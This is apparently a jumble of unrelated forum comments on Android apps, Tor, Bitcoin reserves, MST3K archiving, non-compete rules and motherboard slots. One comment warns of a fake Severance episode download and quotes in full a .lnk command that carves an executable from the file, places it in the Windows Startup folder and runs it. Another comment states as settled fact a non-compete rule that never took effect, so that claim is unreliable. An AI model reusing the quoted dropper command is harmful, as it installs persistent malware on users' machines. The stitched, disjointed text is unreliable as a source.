There is a Safetycore "placeholder" app on github here

https://github.com/daboynb/Safetycore-placeholder

All it does is create an app with the same name in the app list. This should cause an error if Android tries to reinstall Safetycore.

Maybe we can combine it with "wildfires".

No, they cannot.

It's very slow, and many websites block TOR users.

What's their refugee policy?

I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!

I don't like this version of you. Go take a nap and try again.

In a statement, HUD spokesperson Kasey Lovett said that the stunt was “another waste of taxpayer dollars and resources” and that “appropriate action will be taken for all involved.”

I'm hearing "Pizza Party"!!!

I can't think of any. The current oil reserve is supposed to be used in the case of another oil embargo. But its actual use is to lower gas prices when the administration in power needs a political win.

I actually think the purpose of a Bitcoin reserve is to temporarily increase the price so tech-bros (re: Elon) can sell at a massive profit. Then buy back at a much lower price. It's just a way to indirectly transfer federal dollars into administration pockets.

I can't find any reason for the government to buy crypto and hold it in reserve.

Remember when Donald Trump was president, in the lobotomized body of Bill the Cat? Haha good times.

I've seen a lot of official MST3K (Mystery Science Theater 3000, ya boob) getting streamed on Youtube. I have a lot of these already from quite a while ago, sourced from various places. Some from my own DVD rips (thanks Netflix), downloaded DVD rips, and a small amount of "lost" content coming from VHS rips off broadcast.

Are the Youtube streams worth archiving? I was specifically looking at a livestream for Season 1 that "includes lost host segments". I was going to download it through Newpipe, but I didn't see the option on this stream (granted, I didn't look too deeply).

Are these streams worth the time if I already have the episodes? Have they been cleaned-up in any way?

This goes into effect September 4, 2024. Employers with existing non-compete agreements must post the notice on page 163 (38504). After that date you may accept a job offer from anybody, including a direct competitor, and not worry about violating any non-compete agreement.

I recently bought this motherboard, based on descriptions on pcpartpicker.com and B&H's website. Both sites claim the board has 5 PCIe x16 slots (2x version 4, and 3x version 3). But I have the board in front of me, and while it certainly has full length slots, most of the pins are missing in all but one of them. Closer examination of the MSI website has this to say:

  • 5x PCI-E x16 slot

  • PCI_E1 Gen PCIe 4.0 supports up to x16 (From CPU)

  • PCI_E2 Gen PCIe 3.0 supports up to x1 (From Chipset)

  • PCI_E3 Gen PCIe 4.0 supports up to x4 (From Chipset)

  • PCI_E4 Gen PCIe 3.0 supports up to x1 (From Chipset)

  • PCI_E5 Gen PCIe 3.0 supports up to x1 (From Chipset)

Have I been swindled? Am I just stupid or ignorant?
